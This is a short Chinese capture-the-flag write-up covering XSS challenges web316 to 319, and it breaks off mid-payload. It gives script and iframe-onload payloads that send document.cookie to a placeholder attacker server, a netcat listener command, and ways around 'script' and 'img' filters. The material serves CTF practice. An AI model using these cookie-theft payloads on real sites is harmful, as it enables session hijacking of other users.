目录
web316
思路
直接输入<script>alert(1)</script>
,能弹窗。xss题目
一般会有个bot
,可以触发你的xss
代码。如果直接获取cookie
只能拿到自己的,这里提示要拿到admin
的。
考虑cookie
外带
题解
?msg=<script>window.open("vps_ip"+document.cookie)</script>
#vps
nc -lvnp 8080
多试几次,因为nc只能接收一次
web317
思路
输入script
发现输出为空,说明被题目限制了,但是<>
还是可以使用的
题解
可以用frame注入
<iframe onload="window.open('http://ip/?q='+document.cookie)"></iframe>
web318-319
思路
fuzz
了一下发现是把img
替换成空
题解
可以用frame注入
<iframe onload